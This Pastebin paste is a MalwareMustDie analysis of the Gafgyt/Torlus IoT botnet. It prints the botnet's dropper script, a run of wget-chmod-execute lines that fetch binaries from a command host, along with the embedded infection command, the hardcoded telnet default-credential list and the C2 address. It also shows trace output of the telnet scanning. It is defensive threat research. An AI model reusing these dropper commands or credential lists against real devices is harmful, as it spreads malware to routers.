API tools faq
paste
Advertisement
MalwareMustDie

TORLUS.C / LIZKEBAB / GAYFGT /BASHDOOR

MalwareMustDie
Feb 17th, 2016
1,561
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 9.87 KB | None | 0 0
raw download clone embed print report
  1. #############################################
  2. ##
  3. ##  THIS IS THE EXPLANATION OF HOW
  4. ##  LIZKEBAB / TORLUS
  5. ##  AKA: GAYFGT / BASHDOOR / BASHLITE
  6. ##  WORKS, IN THE RECENT UP & ALIVE VERSION
  7. ##
  8. ##  noted by @unixfreaxjp / #MalwareMustDie
  9. ##
  10. ############################################
  11.  
  12. // cnc location...
  13. { "ip": "208.67.1.142",
  14.   "hostname": "No Hostname",
  15.   "city": "Kansas City",
  16.   "region": "Missouri",
  17.   "country": "US",
  18.   "loc": "39.1472,-94.5735",
  19.   "org": "AS33387 DataShack, LC",
  20.   "postal": "64116" }
  21.  
  22.  
  23. // weaponized:
  24. 208.67.1.142/hack/Binarys.sh (install)
  25. 208.67.1.142/qbot/Binarys.sh (updates)
  26.  
  27. // These are the ELF binaries... see how was prepared multi architecture..
  28.  
  29. $ cat Binarys.sh
  30. cd /tmp && wget -q http://208.67.1.142/hack/telmipsel && chmod +x telmipsel && ./telmipsel
  31. cd /tmp && wget -q http://208.67.1.142/hack/telmips && chmod +x telmips && ./telmips
  32. cd /tmp && wget -q http://208.67.1.142/hack/telsh4 && chmod +x telsh4 && ./telsh4
  33. cd /tmp && wget -q http://208.67.1.142/hack/telx86 && chmod +x telx86 && ./telx86
  34. cd /tmp && wget -q http://208.67.1.142/hack/telarmv6 && chmod +x telarmv6 && ./telarmv6
  35. cd /tmp && wget -q http://208.67.1.142/hack/teli686 && chmod +x teli686 && ./teli686
  36. cd /tmp && wget -q http://208.67.1.142/hack/telpowerpc && chmod +x telpowerpc && ./telpowerpc
  37. cd /tmp && wget -q http://208.67.1.142/hack/teli586 && chmod +x teli586 && ./teli586
  38. cd /tmp && wget -q http://208.67.1.142/hack/telm86k && chmod +x telm86k && ./telm86k
  39. cd /tmp && wget -q http://208.67.1.142/hack/telsparc && chmod +x telsparc && ./telsparc
  40. cd /tmp && wget -q http://208.67.1.142/hack/telarmv5l && chmod +x telarmv5l && ./telarmv5l
  41. cd /tmp && wget -q http://208.67.1.142/hack/telarmv4l && chmod +x telarmv4l && ./telarmv4l
  42. rm -rf tel*
  43. cd /tmp && busybox wget -q http://208.67.1.142/hack/telmipsel && chmod +x telmipsel && ./telmipsel
  44. cd /tmp && busybox wget -q http://208.67.1.142/hack/telmips && chmod +x telmips && ./telmips
  45. cd /tmp && busybox wget -q http://208.67.1.142/hack/telsh4 && chmod +x telsh4 && ./telsh4
  46. cd /tmp && busybox wget -q http://208.67.1.142/hack/telx86 && chmod +x telx86 && ./telx86
  47. cd /tmp && busybox wget -q http://208.67.1.142/hack/telarmv6 && chmod +x telarmv6 && ./telarmv6
  48. cd /tmp && busybox wget -q http://208.67.1.142/hack/teli686 && chmod +x teli686 && ./teli686
  49. cd /tmp && busybox wget -q http://208.67.1.142/hack/telpowerpc && chmod +x telpowerpc && ./telpowerpc
  50. cd /tmp && busybox wget -q http://208.67.1.142/hack/teli586 && chmod +x teli586 && ./teli586
  51. cd /tmp && busybox wget -q http://208.67.1.142/hack/telm86k && chmod +x telm86k && ./telm86k
  52. cd /tmp && busybox wget -q http://208.67.1.142/hack/telsparc && chmod +x telsparc && ./telsparc
  53. cd /tmp && busybox wget -q http://208.67.1.142/hack/telarmv5l && chmod +x telarmv5l && ./telarmv5l
  54. cd /tmp && busybox wget -q http://208.67.1.142/hack/telarmv4l && chmod +x telarmv4l && ./telarmv4l
  55.  
  56. // downloaaaaaaad!
  57.  
  58. HTTP/1.1 200 OK
  59. Date: Wed, 17 Feb 2016 15:25:25 GMT
  60. Server: Apache/2.2.15 (CentOS)
  61. Last-Modified: Fri, 29 Jan 2016 02:33:39 GMT
  62. ETag: "4371a-30d77-52a6fdcee7bf6"
  63. Accept-Ranges: bytes
  64. Content-Length: 200055
  65. Connection: close
  66. Content-Type: text/plain; charset=UTF-8
  67. 200 OK
  68. URI content encoding = 'UTF-8'
  69. Length: 200055 (195K) [text/plain]
  70. Saving to: 'telx86'
  71. telx86  100%[==========>] 195.37K  25.3KB/sin 8.6s
  72. 2016-02-18 00:25:34 (22.6 KB/s) - 'telx86' saved [200055/200055]
  73.  
  74.  
  75. #############################################
  76. ##
  77. ##  THIS IS HOW IT WORKS
  78. ##  EXPLAINED IN SIMPLEST WAY
  79. ##
  80. ############################################
  81.  
  82. //// it loads these data...
  83.  
  84. // cnc
  85.  
  86. .rodata:0805D2A0 00000012 C 149.91.89.253:443
  87.  
  88. // root
  89.  
  90. .rodata:0805D2B2 00000005 C root  
  91.  
  92. // user
  93.  
  94. .rodata:0805D2B8 00000006 C admin
  95. .rodata:0805D2BF 00000005 C user  
  96. .rodata:0805D2C5 00000006 C login
  97. .rodata:0805D2CC 00000006 C guest
  98. .rodata:0805D2D3 00000008 C support  
  99. .rodata:0805D2DC 00000005 C toor  
  100.  
  101. // password...
  102.  
  103. .rodata:0805D2E2 00000009 C changeme
  104. .rodata:0805D2EC 00000005 C 1234  
  105. .rodata:0805D2F2 00000006 C 12345
  106. .rodata:0805D2F9 00000007 C 123456
  107. .rodata:0805D301 00000008 C default  
  108. .rodata:0805D30A 00000005 C pass  
  109. .rodata:0805D310 00000009 C password
  110.  
  111. // shell to be executed upon telnet scan succeeded (download..install)
  112.  
  113. .rodata:0805D795 00000005 C sh\r\n
  114. .rodata:0805D79A 00000008 C shell\r\n
  115. .rodata:0805D7A4 00000074 C wget http://208.67.1.142/qbot/Binarys.sh -O /tmp/bash.sh;chmod +x /tmp/bash.sh ; sh /tmp/bash.sh; rm /tmp/bash.sh\r\n
  116. .rodata:0805D818 00000020 C /bin/busybox;echo -e 'gayfgt'\r\n
  117. .rodata:0805D842 00000010 C REPORT %s:%s:%s
  118. .rodata:0805D852 00000007 C gayfgt
  119.  
  120. ///// now... cnc back connects..
  121.  
  122. 21008 connect(3, {AF_INET, 443, 149.91.89.253);
  123.  
  124. [cpuset] 20873 mmd  cwd    DIR      8,1     4096       2 /
  125. [cpuset] 20873 mmd  rtd    DIR      8,1     4096       2 /
  126. [cpuset] 20873 mmd  txt    REG      8,6   161632 7209159 /SAMPLE
  127. [cpuset] 20873 mmd    0u   CHR    136,2 0t0  5 /dev/pts/2
  128. [cpuset] 20873 mmd    1u   CHR    136,2 0t0  5 /dev/pts/2
  129. [cpuset] 20873 mmd    2u   CHR    136,2 0t0  5 /dev/pts/2
  130. [cpuset] 20873 mmd    3u  IPv4 23161746 0t0TCP MMD.ORG:59869->149.91.89.253:443 (ESTABLISHED)
  131.  
  132. ////// received: telnet attack switch on...
  133.  
  134. recv(3, "!",  1, 0)
  135. recv(3, "*",  1, 0)
  136. recv(3, " ",  1, 0)
  137. recv(3, "S",  1, 0)
  138. recv(3, "C",  1, 0)
  139. recv(3, "A",  1, 0)
  140. recv(3, "N",  1, 0)
  141. recv(3, "N",  1, 0)
  142. recv(3, "E",  1, 0)
  143. recv(3, "R",  1, 0)
  144. recv(3, " ",  1, 0)
  145. recv(3, "O",  1, 0)
  146. recv(3, "N",  1, 0)
  147. recv(3, "\n", 1, 0)
  148.  
  149. ///// forking for the telnet attack session
  150.  
  151. fork()
  152. write(1, "FORK\n", 5);
  153.  
  154. /////// fork done and faaaaiyyaaaaaaaa----!
  155.  
  156. [cpuset] 20874 mmd  cwd    DIR      8,1     4096        2 /
  157. [cpuset] 20874 mmd  rtd    DIR      8,1     4096        2 /
  158. [cpuset] 20874 mmd  txt    REG      8,6   161632  7209159 /SAMPLE
  159. [cpuset] 20874 mmd    0u   CHR    136,2 0t0   5 /dev/pts/2
  160. [cpuset] 20874 mmd    1u   CHR    136,2 0t0   5 /dev/pts/2
  161. [cpuset] 20874 mmd    2u   CHR    136,2 0t0   5 /dev/pts/2
  162. [cpuset] 20874 mmd    3u  IPv4 23161746 0t0 TCP MMD.ORG:59869->149.91.89.253:443 (ESTABLISHED)
  163. [cpuset] 20874 mmd    4u  IPv4 23161774 0t0 TCP MMD.ORG:57971->11.159.98.247:23 (SYN_SENT)
  164. [cpuset] 20874 mmd    5u  IPv4 23161775 0t0 TCP MMD.ORG:56070->11.159.98.248:23 (SYN_SENT)
  165. [cpuset] 20874 mmd    6u  IPv4 23166590 0t0 TCP MMD.ORG:55366->11.159.98.249:23 (SYN_SENT)
  166. [cpuset] 20874 mmd    7u  IPv4 23166591 0t0 TCP MMD.ORG:54561->11.159.98.250:23 (SYN_SENT)
  167. [cpuset] 20874 mmd    8u  IPv4 23167725 0t0 TCP MMD.ORG:39495->11.159.98.251:23 (SYN_SENT)
  168. [cpuset] 20874 mmd    9u  IPv4 23167726 0t0 TCP MMD.ORG:38934->11.159.98.252:23 (SYN_SENT)
  169. [cpuset] 20874 mmd   10u  IPv4 23167727 0t0 TCP MMD.ORG:33664->11.159.98.253:23 (SYN_SENT)
  170. [cpuset] 20874 mmd   11u  IPv4 23167728 0t0 TCP MMD.ORG:49161->11.159.98.254:23 (SYN_SENT)
  171. [cpuset] 20874 mmd   12u  IPv4 23165034 0t0 TCP MMD.ORG:51762->11.159.98.255:23 (SYN_SENT)
  172. // PoC picture: https://pbs.twimg.com/media/Cbb4Nj4UAAAtn-9.jpg
  173.  
  174. // scanning target:
  175. 11.159.98.x ; 174.96.64.x ; 207.193.179.x ; 136.102.45.x ;
  176. These are mostly dial up network in USA...they aimed routers with telnet service with def. credential..
  177.  
  178. // other strings in the ELF binary shows obvious known operations:
  179.  
  180. .rodata:0805D31A (null)
  181. .rodata:0805D321 buf: %s\n
  182. .rodata:0805D32A -c
  183. .rodata:0805D32D sh
  184. .rodata:0805D330 /bin/sh  
  185. .rodata:0805D740 /proc/cpuinfo  
  186. .rodata:0805D74E BOGOMIPS
  187. .rodata:0805D757 PING  
  188. .rodata:0805D75C :>%$#
  189. .rodata:0805D763 %d.%d.%d.%d
  190. .rodata:0805D76F %d.%d.%d.0  
  191. .rodata:0805D77A login:
  192. .rodata:0805D780 \r\n  
  193. .rodata:0805D783 password:
  194. .rodata:0805D78C incorrect
  195. .rodata:0805D838 multi-call
  196. .rodata:0805D88C Failed opening raw socket.
  197. .rodata:0805D8A8 Failed setting raw headers mode.
  198. .rodata:0805D8C9 all
  199. .rodata:0805D8CF syn
  200. .rodata:0805D8D3 rst
  201. .rodata:0805D8D7 fin
  202. .rodata:0805D8DB ack
  203. .rodata:0805D8DF psh
  204. .rodata:0805D8E3 Invalid flag
  205. .rodata:0805D8F5 PONG!
  206. .rodata:0805D8FB GETLOCALIP  
  207. .rodata:0805D906 My IP: %s
  208. .rodata:0805D910 SCANNER  
  209. .rodata:0805D918 SCANNER ON | OFF  
  210. .rodata:0805D929 OFF
  211. .rodata:0805D92D ON
  212. .rodata:0805D930 FORK  
  213. .rodata:0805D935 HOLD  
  214. .rodata:0805D93A JUNK  
  215. .rodata:0805D93F UDP
  216. .rodata:0805D943 TCP
  217. .rodata:0805D947 KILLATTK
  218. .rodata:0805D950 Killed %d.  
  219. .rodata:0805D95B None Killed.
  220. .rodata:0805D968 LOLNOGTFO
  221. .rodata:0805D972 8.8.8.8  
  222. .rodata:0805D97A /proc/net/route
  223. .rodata:0805D98A \t00000000\t
  224. .rodata:0805D995 [cpuset]
  225. .rodata:0805D99E fork failed\n  
  226. .rodata:0805D9AD FAILED TO CONNECT
  227. .rodata:0805D9BF PONG  
  228. .rodata:0805D9C4 DUP
  229. .rodata:0805D9C8 SH
  230. .rodata:0805D9CB %s 2>&1  
  231. .rodata:0805D9D7 LINK CLOSED
  232. .rodata:0805DA18 0.9.30
  233. .rodata:0805E088 -c
  234. .rodata:0805E08B /bin/sh  
  235. .rodata:0805E2EC /dev/null
  236. .rodata:0805E334 clntudp_create: out of memory\n  
  237. .rodata:0805E3A0 bad auth_len gid %d str %d auth %d\n
  238. .rodata:0805E3C4 xdr_string: out of memory\n
  239. .rodata:0805E3DF xdr_bytes: out of memory\n
  240. .rodata:0805E428 (nil)
  241. .rodata:0805E42E (null)
  242. .rodata:0805E485 npxXoudifFeEgGaACScs
  243. .rodata:0805F050 __get_myaddress: socket
  244. .rodata:0805F068 __get_myaddress: ioctl (get interface configuration)  
  245. .rodata:0805F09D __get_myaddress: ioctl  
  246. .rodata:0805F0B4 Cannot register service
  247. .rodata:0805F0DC xdr_array: out of memory\n
  248. .rodata:0805F0F8 /etc/resolv.conf  
  249. .rodata:0805F109 /etc/config/resolv.conf
  250. .rodata:0805F121 nameserver  
  251. .rodata:0805F12C domain
  252. .rodata:0805F133 search
  253. .rodata:0805F13A %s%s%m\n
  254. .rodata:0805F21C RPC: (unknown error code)  
  255. .rodata:0805F236 %s:
  256. .rodata:0805F23B  -
  257. .rodata:0805F23F ; errno = %s
  258. .rodata:0805F24C ; low version = %lu, high version = %lu
  259. .rodata:0805F274 ; why =  
  260. .rodata:0805F27D (unknown authentication error - %d)
  261. .rodata:0805F2A1 ; s1 = %lu, s2 = %lu
  262. .rodata:0805F694 %x
  263. .rodata:0805F697 0123456789abcdef  
  264. .rodata:0805F6A8 /etc/hosts  
  265. .rodata:0805F6B3 /etc/config/hosts
  266.  
  267. ---
  268. #MalwareMustDie
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!